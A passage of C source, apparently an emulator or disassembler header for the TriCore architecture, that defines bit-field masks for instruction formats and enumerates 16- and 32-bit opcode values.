Format */ #define MASK_OP_BOL_OFF16(op) ((MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6)) + \ (MASK_BITS_SHIFT(op, 22, 27) << 10)) #define MASK_OP_BOL_OFF16_SEXT(op) ((MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6)) + \ (MASK_BITS_SHIFT_SEXT(op, 22, 27) << 10)) #define MASK_OP_BOL_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BOL_S1D(op) MASK_BITS_SHIFT(op, 8, 11) /* BRC Format */ #define MASK_OP_BRC_OP2(op) MASK_BITS_SHIFT(op, 31, 31) #define MASK_OP_BRC_DISP15(op) MASK_BITS_SHIFT(op, 16, 30) #define MASK_OP_BRC_DISP15_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 16, 30) #define MASK_OP_BRC_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BRC_CONST4_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 15) #define MASK_OP_BRC_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* BRN Format */ #define MASK_OP_BRN_OP2(op) MASK_BITS_SHIFT(op, 31, 31) #define MASK_OP_BRN_DISP15(op) MASK_BITS_SHIFT(op, 16, 30) #define MASK_OP_BRN_DISP15_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 16, 30) #define MASK_OP_BRN_N(op) (MASK_BITS_SHIFT(op, 12, 15) + \ (MASK_BITS_SHIFT(op, 7, 7) << 4)) #define MASK_OP_BRN_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* BRR Format */ #define MASK_OP_BRR_OP2(op) MASK_BITS_SHIFT(op, 31, 31) #define MASK_OP_BRR_DISP15(op) MASK_BITS_SHIFT(op, 16, 30) #define MASK_OP_BRR_DISP15_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 16, 30) #define MASK_OP_BRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BRR_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* META MASK for similar instr Formats */ #define MASK_OP_META_D(op) MASK_BITS_SHIFT(op, 28, 31) #define MASK_OP_META_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* RC Format */ #define MASK_OP_RC_D(op) MASK_OP_META_D(op) #define MASK_OP_RC_OP2(op) MASK_BITS_SHIFT(op, 21, 27) #define MASK_OP_RC_CONST9(op) MASK_BITS_SHIFT(op, 12, 20) #define MASK_OP_RC_CONST9_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 20) #define MASK_OP_RC_S1(op) MASK_OP_META_S1(op) /* RCPW Format */ #define MASK_OP_RCPW_D(op) MASK_OP_META_D(op) #define MASK_OP_RCPW_POS(op) MASK_BITS_SHIFT(op, 23, 27) #define MASK_OP_RCPW_OP2(op) MASK_BITS_SHIFT(op, 21, 22) #define MASK_OP_RCPW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RCPW_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RCPW_S1(op) MASK_OP_META_S1(op) /* RCR Format */ #define MASK_OP_RCR_D(op) MASK_OP_META_D(op) #define MASK_OP_RCR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RCR_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RCR_CONST9(op) MASK_BITS_SHIFT(op, 12, 20) #define MASK_OP_RCR_CONST9_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 20) #define MASK_OP_RCR_S1(op) MASK_OP_META_S1(op) /* RCRR Format */ #define MASK_OP_RCRR_D(op) MASK_OP_META_D(op) #define MASK_OP_RCRR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RCRR_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RCRR_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RCRR_S1(op) MASK_OP_META_S1(op) /* RCRW Format */ #define MASK_OP_RCRW_D(op) MASK_OP_META_D(op) #define MASK_OP_RCRW_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RCRW_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RCRW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RCRW_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RCRW_S1(op) MASK_OP_META_S1(op) /* RLC Format */ #define MASK_OP_RLC_D(op) MASK_OP_META_D(op) #define MASK_OP_RLC_CONST16(op) MASK_BITS_SHIFT(op, 12, 27) #define MASK_OP_RLC_CONST16_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 27) #define MASK_OP_RLC_S1(op) MASK_OP_META_S1(op) /* RR Format */ #define MASK_OP_RR_D(op) MASK_OP_META_D(op) #define MASK_OP_RR_OP2(op) 
MASK_BITS_SHIFT(op, 20, 27) #define MASK_OP_RR_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RR_S1(op) MASK_OP_META_S1(op) /* RR1 Format */ #define MASK_OP_RR1_D(op) MASK_OP_META_D(op) #define MASK_OP_RR1_OP2(op) MASK_BITS_SHIFT(op, 18, 27) #define MASK_OP_RR1_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RR1_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RR1_S1(op) MASK_OP_META_S1(op) /* RR2 Format */ #define MASK_OP_RR2_D(op) MASK_OP_META_D(op) #define MASK_OP_RR2_OP2(op) MASK_BITS_SHIFT(op, 16, 27) #define MASK_OP_RR2_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RR2_S1(op) MASK_OP_META_S1(op) /* RRPW Format */ #define MASK_OP_RRPW_D(op) MASK_OP_META_D(op) #define MASK_OP_RRPW_POS(op) MASK_BITS_SHIFT(op, 23, 27) #define MASK_OP_RRPW_OP2(op) MASK_BITS_SHIFT(op, 21, 22) #define MASK_OP_RRPW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RRPW_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRPW_S1(op) MASK_OP_META_S1(op) /* RRR Format */ #define MASK_OP_RRR_D(op) MASK_OP_META_D(op) #define MASK_OP_RRR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRR_OP2(op) MASK_BITS_SHIFT(op, 20, 23) #define MASK_OP_RRR_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRR_S1(op) MASK_OP_META_S1(op) /* RRR1 Format */ #define MASK_OP_RRR1_D(op) MASK_OP_META_D(op) #define MASK_OP_RRR1_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRR1_OP2(op) MASK_BITS_SHIFT(op, 18, 23) #define MASK_OP_RRR1_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RRR1_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRR1_S1(op) MASK_OP_META_S1(op) /* RRR2 Format */ #define MASK_OP_RRR2_D(op) MASK_OP_META_D(op) #define MASK_OP_RRR2_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRR2_OP2(op) MASK_BITS_SHIFT(op, 16, 23) #define MASK_OP_RRR2_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRR2_S1(op) MASK_OP_META_S1(op) /* RRRR Format */ #define MASK_OP_RRRR_D(op) MASK_OP_META_D(op) #define MASK_OP_RRRR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRRR_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RRRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRRR_S1(op) MASK_OP_META_S1(op) /* RRRW Format */ #define MASK_OP_RRRW_D(op) MASK_OP_META_D(op) #define MASK_OP_RRRW_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRRW_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RRRW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RRRW_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRRW_S1(op) MASK_OP_META_S1(op) /* SYS Format */ #define MASK_OP_SYS_OP2(op) MASK_BITS_SHIFT(op, 22, 27) #define MASK_OP_SYS_S1D(op) MASK_OP_META_S1(op) /* * Tricore Opcodes Enums * * Format: OPC(1|2|M)_InstrLen_Name * OPC1 = only op1 field is used * OPC2 = op1 and op2 field used part of OPCM * OPCM = op1 field used to group Instr * InstrLen = 16|32 * Name = Name of Instr */ /* 16-Bit */ enum { OPCM_16_SR_SYSTEM = 0x00, OPCM_16_SR_ACCU = 0x32, OPC1_16_SRC_ADD = 0xc2, OPC1_16_SRC_ADD_A15 = 0x92, OPC1_16_SRC_ADD_15A = 0x9a, OPC1_16_SRR_ADD = 0x42, OPC1_16_SRR_ADD_A15 = 0x12, OPC1_16_SRR_ADD_15A = 0x1a, OPC1_16_SRC_ADD_A = 0xb0, OPC1_16_SRR_ADD_A = 0x30, OPC1_16_SRR_ADDS = 0x22, OPC1_16_SRRS_ADDSC_A = 0x10, OPC1_16_SC_AND = 0x16, OPC1_16_SRR_AND = 0x26, OPC1_16_SC_BISR = 0xe0, OPC1_16_SRC_CADD = 0x8a, OPC1_16_SRC_CADDN = 0xca, OPC1_16_SB_CALL = 0x5c, OPC1_16_SRC_CMOV = 0xaa, OPC1_16_SRR_CMOV = 0x2a, OPC1_16_SRC_CMOVN = 0xea, OPC1_16_SRR_CMOVN = 0x6a, OPC1_16_SRC_EQ = 0xba, OPC1_16_SRR_EQ = 
0x3a, OPC1_16_SB_J = 0x3c, OPC1_16_SBC_JEQ = 0x1e, OPC1_16_SBC_JEQ2 = 0x9e, OPC1_16_SBR_JEQ = 0x3e, OPC1_16_SBR_JEQ2 = 0xbe, OPC1_16_SBR_JGEZ = 0xce, OPC1_16_SBR_JGTZ = 0x4e, OPC1_16_SR_JI = 0xdc, OPC1_16_SBR_JLEZ = 0x8e, OPC1_16_SBR_JLTZ = 0x0e, OPC1_16_SBC_JNE = 0x5e, OPC1_16_SBC_JNE2 = 0xde, OPC1_16_SBR_JNE = 0x7e, OPC1_16_SBR_JNE2 = 0xfe, OPC1_16_SB_JNZ = 0xee, OPC1_16_SBR_JNZ = 0xf6, OPC1_16_SBR_JNZ_A = 0x7c, OPC1_16_SBRN_JNZ_T = 0xae, OPC1_16_SB_JZ = 0x6e, OPC1_16_SBR_JZ = 0x76, OPC1_16_SBR_JZ_A = 0xbc, OPC1_16_SBRN_JZ_T = 0x2e, OPC1_16_SC_LD_A = 0xd8, OPC1_16_SLR_LD_A = 0xd4, OPC1_16_SLR_LD_A_POSTINC = 0xc4, OPC1_16_SLRO_LD_A = 0xc8, OPC1_16_SRO_LD_A = 0xcc, OPC1_16_SLR_LD_BU = 0x14, OPC1_16_SLR_LD_BU_POSTINC = 0x04, OPC1_16_SLRO_LD_BU = 0x08, OPC1_16_SRO_LD_BU = 0x0c, OPC1_16_SLR_LD_H = 0x94, OPC1_16_SLR_LD_H_POSTINC = 0x84, OPC1_16_SLRO_LD_H = 0x88, OPC1_16_SRO_LD_H = 0x8c, OPC1_16_SC_LD_W = 0x58, OPC1_16_SLR_LD_W = 0x54, OPC1_16_SLR_LD_W_POSTINC = 0x44, OPC1_16_SLRO_LD_W = 0x48, OPC1_16_SRO_LD_W = 0x4c, OPC1_16_SBR_LOOP = 0xfc, OPC1_16_SRC_LT = 0xfa, OPC1_16_SRR_LT = 0x7a, OPC1_16_SC_MOV = 0xda, OPC1_16_SRC_MOV = 0x82, OPC1_16_SRR_MOV = 0x02, OPC1_16_SRC_MOV_E = 0xd2,/* 1.6 only */ OPC1_16_SRC_MOV_A = 0xa0, OPC1_16_SRR_MOV_A = 0x60, OPC1_16_SRR_MOV_AA = 0x40, OPC1_16_SRR_MOV_D = 0x80, OPC1_16_SRR_MUL = 0xe2, OPC1_16_SR_NOT = 0x46, OPC1_16_SC_OR = 0x96, OPC1_16_SRR_OR = 0xa6, OPC1_16_SRC_SH = 0x06, OPC1_16_SRC_SHA = 0x86, OPC1_16_SC_ST_A = 0xf8, OPC1_16_SRO_ST_A = 0xec, OPC1_16_SSR_ST_A = 0xf4, OPC1_16_SSR_ST_A_POSTINC = 0xe4, OPC1_16_SSRO_ST_A = 0xe8, OPC1_16_SRO_ST_B = 0x2c, OPC1_16_SSR_ST_B = 0x34, OPC1_16_SSR_ST_B_POSTINC = 0x24, OPC1_16_SSRO_ST_B = 0x28, OPC1_16_SRO_ST_H = 0xac, OPC1_16_SSR_ST_H = 0xb4, OPC1_16_SSR_ST_H_POSTINC = 0xa4, OPC1_16_SSRO_ST_H = 0xa8, OPC1_16_SC_ST_W = 0x78, OPC1_16_SRO_ST_W = 0x6c, OPC1_16_SSR_ST_W = 0x74, OPC1_16_SSR_ST_W_POSTINC = 0x64, OPC1_16_SSRO_ST_W = 0x68, OPC1_16_SRR_SUB = 0xa2, OPC1_16_SRR_SUB_A15B = 0x52, OPC1_16_SRR_SUB_15AB = 0x5a, OPC1_16_SC_SUB_A = 0x20, OPC1_16_SRR_SUBS = 0x62, OPC1_16_SRR_XOR = 0xc6, }; /* * SR Format */ /* OPCM_16_SR_SYSTEM */ enum { OPC2_16_SR_NOP = 0x00, OPC2_16_SR_RET = 0x09, OPC2_16_SR_RFE = 0x08, OPC2_16_SR_DEBUG = 0x0a, OPC2_16_SR_FRET = 0x07, }; /* OPCM_16_SR_ACCU */ enum { OPC2_16_SR_RSUB = 0x05, OPC2_16_SR_SAT_B = 0x00, OPC2_16_SR_SAT_BU = 0x01, OPC2_16_SR_SAT_H = 0x02, OPC2_16_SR_SAT_HU = 0x03, }; /* 32-Bit */ enum { /* ABS Format 1, M */ OPCM_32_ABS_LDW = 0x85, OPCM_32_ABS_LDB = 0x05, OPCM_32_ABS_LDMST_SWAP = 0xe5, OPCM_32_ABS_LDST_CONTEXT = 0x15, OPCM_32_ABS_STORE = 0xa5, OPCM_32_ABS_STOREB_H = 0x25, OPC1_32_ABS_STOREQ = 0x65, OPC1_32_ABS_LD_Q = 0x45, OPC1_32_ABS_LEA = 0xc5, /* ABSB Format */ OPC1_32_ABSB_ST_T = 0xd5, /* B Format */ OPC1_32_B_CALL = 0x6d, OPC1_32_B_CALLA = 0xed, OPC1_32_B_FCALL = 0x61, OPC1_32_B_FCALLA = 0xe1, OPC1_32_B_J = 0x1d, OPC1_32_B_JA = 0x9d, OPC1_32_B_JL = 0x5d, OPC1_32_B_JLA = 0xdd, /* Bit Format */ OPCM_32_BIT_ANDACC = 0x47, OPCM_32_BIT_LOGICAL_T1 = 0x87, OPCM_32_BIT_INSERT = 0x67, OPCM_32_BIT_LOGICAL_T2 = 0x07, OPCM_32_BIT_ORAND = 0xc7, OPCM_32_BIT_SH_LOGIC1 = 0x27, OPCM_32_BIT_SH_LOGIC2 = 0xa7, /* BO Format */ OPCM_32_BO_ADDRMODE_POST_PRE_BASE = 0x89, OPCM_32_BO_ADDRMODE_BITREVERSE_CIRCULAR = 0xa9, OPCM_32_BO_ADDRMODE_LD_POST_PRE_BASE = 0x09, OPCM_32_BO_ADDRMODE_LD_BITREVERSE_CIRCULAR = 0x29, OPCM_32_BO_ADDRMODE_STCTX_POST_PRE_BASE = 0x49, OPCM_32_BO_ADDRMODE_LDMST_BITREVERSE_CIRCULAR = 0x69, /* BOL Format */ OPC1_32_BOL_LD_A_LONGOFF = 0x99, OPC1_32_BOL_LD_W_LONGOFF = 
0x19, OPC1_32_BOL_LEA_LONGOFF = 0xd9, OPC1_32_BOL_ST_W_LONGOFF = 0x59, OPC1_32_BOL_ST_A_LONGOFF = 0xb5, /* 1.6 only */ OPC1_32_BOL_LD_B_LONGOFF = 0x79, /* 1.6 only */ OPC1_32_BOL_LD_BU_LONGOFF = 0x39, /* 1.6 only */ OPC1_32_BOL_LD_H_LONGOFF = 0xc9, /* 1.6 only */ OPC1_32_BOL_LD_HU_LONGOFF = 0xb9, /* 1.6 only */ OPC1_32_BOL_ST_B_LONGOFF = 0xe9, /* 1.6 only */ OPC1_32_BOL_ST_H_LONGOFF = 0xf9, /* 1.6 only */ /* BRC Format */ OPCM_32_BRC_EQ_NEQ = 0xdf, OPCM_32_BRC_GE = 0xff, OPCM_32_BRC_JLT = 0xbf, OPCM_32_BRC_JNE = 0x9f, /* BRN Format */ OPCM_32_BRN_JTT = 0x6f, /* BRR Format */ OPCM_32_BRR_EQ_NEQ = 0x5f, OPCM_32_BRR_ADDR_EQ_NEQ = 0x7d, OPCM_32_BRR_GE = 0x7f, OPCM_32_BRR_JLT = 0x3f, OPCM_32_BRR_JNE = 0x1f, OPCM_32_BRR_JNZ = 0xbd, OPCM_32_BRR_LOOP = 0xfd, /* RC Format */ OPCM_32_RC_LOGICAL_SHIFT = 0x8f, OPCM_32_RC_ACCUMULATOR = 0x8b, OPCM_32_RC_SERVICEROUTINE = 0xad, OPCM_32_RC_MUL = 0x53, /* RCPW Format */ OPCM_32_RCPW_MASK_INSERT = 0xb7, /* RCR Format */ OPCM_32_RCR_COND_SELECT = 0xab, OPCM_32_RCR_MADD = 0x13, OPCM_32_RCR_MSUB = 0x33, /* RCRR Format */ OPC1_32_RCRR_INSERT = 0x97, /* RCRW Format */ OPCM_32_RCRW_MASK_INSERT = 0xd7, /* RLC Format */ OPC1_32_RLC_ADDI = 0x1b, OPC1_32_RLC_ADDIH = 0x9b, OPC1_32_RLC_ADDIH_A = 0x11, OPC1_32_RLC_MFCR = 0x4d, OPC1_32_RLC_MOV = 0x3b, OPC1_32_RLC_MOV_64 = 0xfb, /* 1.6 only */ OPC1_32_RLC_MOV_U = 0xbb, OPC1_32_RLC_MOV_H = 0x7b, OPC1_32_RLC_MOVH_A = 0x91, OPC1_32_RLC_MTCR = 0xcd, /* RR Format */ OPCM_32_RR_LOGICAL_SHIFT = 0x0f, OPCM_32_RR_ACCUMULATOR = 0x0b, OPCM_32_RR_ADDRESS = 0x01, OPCM_32_RR_DIVIDE = 0x4b, OPCM_32_RR_IDIRECT = 0x2d, /* RR1 Format */ OPCM_32_RR1_MUL = 0xb3, OPCM_32_RR1_MULQ = 0x93, /* RR2 Format */ OPCM_32_RR2_MUL = 0x73, /* RRPW Format */ OPCM_32_RRPW_EXTRACT_INSERT = 0x37, OPC1_32_RRPW_DEXTR = 0x77, /* RRR Format */ OPCM_32_RRR_COND_SELECT = 0x2b, OPCM_32_RRR_DIVIDE = 0x6b, /* RRR1 Format */ OPCM_32_RRR1_MADD = 0x83, OPCM_32_RRR1_MADDQ_H = 0x43, OPCM_32_RRR1_MADDSU_H = 0xc3, OPCM_32_RRR1_MSUB_H = 0xa3, OPCM_32_RRR1_MSUB_Q = 0x63, OPCM_32_RRR1_MSUBAD_H = 0xe3, /* RRR2 Format */ OPCM_32_RRR2_MADD = 0x03, OPCM_32_RRR2_MSUB = 0x23, /* RRRR Format */ OPCM_32_RRRR_EXTRACT_INSERT = 0x17, /* RRRW Format */ OPCM_32_RRRW_EXTRACT_INSERT = 0x57, /* SYS Format */ OPCM_32_SYS_INTERRUPTS = 0x0d, OPC1_32_SYS_RSTV = 0x2f, }; /* * ABS Format */ /* OPCM_32_ABS_LDW */ enum { OPC2_32_ABS_LD_A = 0x02, OPC2_32_ABS_LD_D = 0x01, OPC2_32_ABS_LD_DA = 0x03, OPC2_32_ABS_LD_W = 0x00, }; /* OPCM_32_ABS_LDB */ enum { OPC2_32_ABS_LD_B = 0x00, OPC2_32_ABS_LD_BU = 0x01, OPC2_32_ABS_LD_H = 0x02, OPC2_32_ABS_LD_HU = 0x03, }; /* OPCM_32_ABS_LDMST_SWAP */ enum { OPC2_32_ABS_LDMST = 0x01, OPC2_32_ABS_SWAP_W = 0x00, }; /* OPCM_32_ABS_LDST_CONTEXT */ enum { OPC2_32_ABS_LDLCX = 0x02, OPC2_32_ABS_LDUCX = 0x03, OPC2_32_ABS_STLCX = 0x00, OPC2_32_ABS_STUCX = 0x01, }; /* OPCM_32_ABS_STORE */ enum { OPC2_32_ABS_ST_A = 0x02, OPC2_32_ABS_ST_D = 0x01, OPC2_32_ABS_ST_DA = 0x03, OPC2_32_ABS_ST_W = 0x00, }; /* OPCM_32_ABS_STOREB_H */ enum { OPC2_32_ABS_ST_B = 0x00, OPC2_32_ABS_ST_H = 0x02, }; /* * Bit Format */ /* OPCM_32_BIT_ANDACC */ enum { OPC2_32_BIT_AND_AND_T = 0x00, OPC2_32_BIT_AND_ANDN_T = 0x03, OPC2_32_BIT_AND_NOR_T = 0x02, OPC2_32_BIT_AND_OR_T = 0x01, }; /* OPCM_32_BIT_LOGICAL_T */ enum { OPC2_32_BIT_AND_T = 0x00, OPC2_32_BIT_ANDN_T = 0x03, OPC2_32_BIT_NOR_T = 0x02, OPC2_32_BIT_OR_T = 0x01, }; /* OPCM_32_BIT_INSERT */ enum { OPC2_32_BIT_INS_T = 0x00, OPC2_32_BIT_INSN_T = 0x01, }; /* OPCM_32_BIT_LOGICAL_T2 */ enum { OPC2_32_BIT_NAND_T = 0x00, OPC2_32_BIT_ORN_T = 0x01, 
OPC2_32_BIT_XNOR_T = 0x02, OPC2_32_BIT_XOR_T = 0x03, }; /* OPCM_32_BIT_ORAND */ enum { OPC2_32_BIT_OR_AND_T = 0x00, OPC2_32_BIT_OR_ANDN_T = 0x03, OPC2_32_BIT_OR_NOR_T = 0x02, OPC2_32_BIT_OR_OR_T = 0x01, }; /*OPCM_32_BIT_SH_LOGIC1 */ enum { OPC2_32_BIT_SH_AND_T = 0x00, OPC2_32_BIT_SH_ANDN_T = 0x03, OPC2_32_BIT_SH_NOR_T = 0x02, OPC2_32_BIT_SH_OR_T = 0x01, }; /* OPCM_32_BIT_SH_LOGIC2 */ enum { OPC2_32_BIT_SH_NAND_T = 0x00, OPC2_32_BIT_SH_ORN_T = 0x01, OPC2_32_BIT_SH_XNOR_T = 0x02, OPC2_32_BIT_SH_XOR_T = 0x03, }; /* * BO Format */ /* OPCM_32_BO_ADDRMODE_POST_PRE_BASE */ enum { OPC2_32_BO_CACHEA_I_SHORTOFF = 0x2e, OPC2_32_BO_CACHEA_I_POSTINC = 0x0e, OPC2_32_BO_CACHEA_I_PREINC = 0x1e, OPC2_32_BO_CACHEA_W_SHORTOFF = 0x2c, OPC2_32_BO_CACHEA_W_POSTINC = 0x0c, OPC2_32_BO_CACHEA_W_PREINC = 0x1c, OPC2_32_BO_CACHEA_WI_SHORTOFF = 0x2d, OPC2_32_BO_CACHEA_WI_POSTINC = 0x0d, OPC2_32_BO_CACHEA_WI_PREINC = 0x1d, /* 1.3.1 only */ OPC2_32_BO_CACHEI_W_SHORTOFF = 0x2b, OPC2_32_BO_CACHEI_W_POSTINC = 0x0b, OPC2_32_BO_CACHEI_W_PREINC = 0x1b, OPC2_32_BO_CACHEI_WI_SHORTOFF = 0x2f, OPC2_32_BO_CACHEI_WI_POSTINC = 0x0f, OPC2_32_BO_CACHEI_WI_PREINC = 0x1f, /* end 1.3.1 only */ OPC2_32_BO_ST_A_SHORTOFF = 0x26, OPC2_32_BO_ST_A_POSTINC = 0x06, OPC2_32_BO_ST_A_PREINC = 0x16, OPC2_32_BO_ST_B_SHORTOFF = 0x20, OPC2_32_BO_ST_B_POSTINC = 0x00, OPC2_32_BO_ST_B_PREINC = 0x10, OPC2_32_BO_ST_D_SHORTOFF = 0x25, OPC2_32_BO_ST_D_POSTINC = 0x05, OPC2_32_BO_ST_D_PREINC = 0x15, OPC2_32_BO_ST_DA_SHORTOFF = 0x27, OPC2_32_BO_ST_DA_POSTINC = 0x07, OPC2_32_BO_ST_DA_PREINC = 0x17, OPC2_32_BO_ST_H_SHORTOFF = 0x22, OPC2_32_BO_ST_H_POSTINC = 0x02, OPC2_32_BO_ST_H_PREINC = 0x12, OPC2_32_BO_ST_Q_SHORTOFF = 0x28, OPC2_32_BO_ST_Q_POSTINC = 0x08, OPC2_32_BO_ST_Q_PREINC = 0x18, OPC2_32_BO_ST_W_SHORTOFF = 0x24, OPC2_32_BO_ST_W_POSTINC = 0x04, OPC2_32_BO_ST_W_PREINC = 0x14, }; /* OPCM_32_BO_ADDRMODE_BITREVERSE_CIRCULAR */ enum { OPC2_32_BO_CACHEA_I_BR = 0x0e, OPC2_32_BO_CACHEA_I_CIRC = 0x1e, OPC2_32_BO_CACHEA_W_BR = 0x0c, OPC2_32_BO_CACHEA_W_CIRC = 0x1c, OPC2_32_BO_CACHEA_WI_BR = 0x0d, OPC2_32_BO_CACHEA_WI_CIRC = 0x1d, OPC2_32_BO_ST_A_BR = 0x06, OPC2_32_BO_ST_A_CIRC = 0x16, OPC2_32_BO_ST_B_BR = 0x00, OPC2_32_BO_ST_B_CIRC = 0x10, OPC2_32_BO_ST_D_BR = 0x05, OPC2_32_BO_ST_D_CIRC = 0x15, OPC2_32_BO_ST_DA_BR = 0x07, OPC2_32_BO_ST_DA_CIRC = 0x17, OPC2_32_BO_ST_H_BR = 0x02, OPC2_32_BO_ST_H_CIRC = 0x12, OPC2_32_BO_ST_Q_BR = 0x08, OPC2_32_BO_ST_Q_CIRC = 0x18, OPC2_32_BO_ST_W_BR = 0x04, OPC2_32_BO_ST_W_CIRC = 0x14, }; /* OPCM_32_BO_ADDRMODE_LD_POST_PRE_BASE */ enum { OPC2_32_BO_LD_A_SHORTOFF = 0x26, OPC2_32_BO_LD_A_POSTINC = 0x06, OPC2_32_BO_LD_A_PREINC = 0x16, OPC2_32_BO_LD_B_SHORTOFF = 0x20, OPC2_32_BO_LD_B_POSTINC = 0x00, OPC2_32_BO_LD_B_PREINC = 0x10, OPC2_32_BO_LD_BU_SHORTOFF = 0x21, OPC2_32_BO_LD_BU_POSTINC = 0x01, OPC2_32_BO_LD_BU_PREINC = 0x11, OPC2_32_BO_LD_D_SHORTOFF = 0x25, OPC2_32_BO_LD_D_POSTINC = 0x05, OPC2_32_BO_LD_D_PREINC = 0x15, OPC2_32_BO_LD_DA_SHORTOFF = 0x27, OPC2_32_BO_LD_DA_POSTINC = 0x07, OPC2_32_BO_LD_DA_PREINC = 0x17, OPC2_32_BO_LD_H_SHORTOFF = 0x22, OPC2_32_BO_LD_H_POSTINC = 0x02, OPC2_32_BO_LD_H_PREINC = 0x12, OPC2_32_BO_LD_HU_SHORTOFF = 0x23, OPC2_32_BO_LD_HU_POSTINC = 0x03, OPC2_32_BO_LD_HU_PREINC = 0x13, OPC2_32_BO_LD_Q_SHORTOFF = 0x28, OPC2_32_BO_LD_Q_POSTINC = 0x08, OPC2_32_BO_LD_Q_PREINC = 0x18, OPC2_32_BO_LD_W_SHORTOFF = 0x24, OPC2_32_BO_LD_W_POSTINC = 0x04, OPC2_32_BO_LD_W_PREINC = 0x14, }; /* OPCM_32_BO_ADDRMODE_LD_BITREVERSE_CIRCULAR */ enum { OPC2_32_BO_LD_A_BR = 0x06, OPC2_32_BO_LD_A_CIRC = 0x16, OPC2_32_BO_LD_B_BR = 0x00, 
OPC2_32_BO_LD_B_CIRC = 0x10, OPC2_32_BO_LD_BU_BR = 0x01, OPC2_32_BO_LD_BU_CIRC = 0x11, OPC2_32_BO_LD_D_BR = 0x05, OPC2_32_BO_LD_D_CIRC = 0x15, OPC2_32_BO_LD_DA_BR = 0x07, OPC2_32_BO_LD_DA_CIRC = 0x17, OPC2_32_BO_LD_H_BR = 0x02, OPC2_32_BO_LD_H_CIRC = 0x12, OPC2_32_BO_LD_HU_BR = 0x03, OPC2_32_BO_LD_HU_CIRC = 0x13, OPC2_32_BO_LD_Q_BR = 0x08, OPC2_32_BO_LD_Q_CIRC = 0x18, OPC2_32_BO_LD_W_BR = 0x04, OPC2_32_BO_LD_W_CIRC = 0x14, }; /* OPCM_32_BO_ADDRMODE_STCTX_POST_PRE_BASE */ enum { OPC2_32_BO_LDLCX_SHORTOFF = 0x24, OPC2_32_BO_LDMST_SHORTOFF = 0x21, OPC2_32_BO_LDMST_POSTINC = 0x01, OPC2_32_BO_LDMST_PREINC = 0x11, OPC2_32_BO_LDUCX_SHORTOFF = 0x25, OPC2_32_BO_LEA_SHORTOFF = 0x28, OPC2_32_BO_STLCX_SHORTOFF = 0x26, OPC2_32_BO_STUCX_SHORTOFF = 0x27, OPC2_32_BO_SWAP_W_SHORTOFF = 0x20, OPC2_32_BO_SWAP_W_POSTINC = 0x00, OPC2_32_BO_SWAP_W_PREINC = 0x10, OPC2_32_BO_CMPSWAP_W_SHORTOFF = 0x23, OPC2_32_BO_CMPSWAP_W_POSTINC = 0x03, OPC2_32_BO_CMPSWAP_W_PREINC = 0x13, OPC2_32_BO_SWAPMSK_W_SHORTOFF = 0x22, OPC2_32_BO_SWAPMSK_W_POSTINC = 0x02, OPC2_32_BO_SWAPMSK_W_PREINC = 0x12, }; /*OPCM_32_BO_ADDRMODE_LDMST_BITREVERSE_CIRCULAR */ enum { OPC2_32_BO_LDMST_BR = 0x01, OPC2_32_BO_LDMST_CIRC = 0x11, OPC2_32_BO_SWAP_W_BR = 0x00, OPC2_32_BO_SWAP_W_CIRC = 0x10, OPC2_32_BO_CMPSWAP_W_BR = 0x03, OPC2_32_BO_CMPSWAP_W_CIRC = 0x13, OPC2_32_BO_SWAPMSK_W_BR = 0x02, OPC2_32_BO_SWAPMSK_W_CIRC = 0x12, }; /* 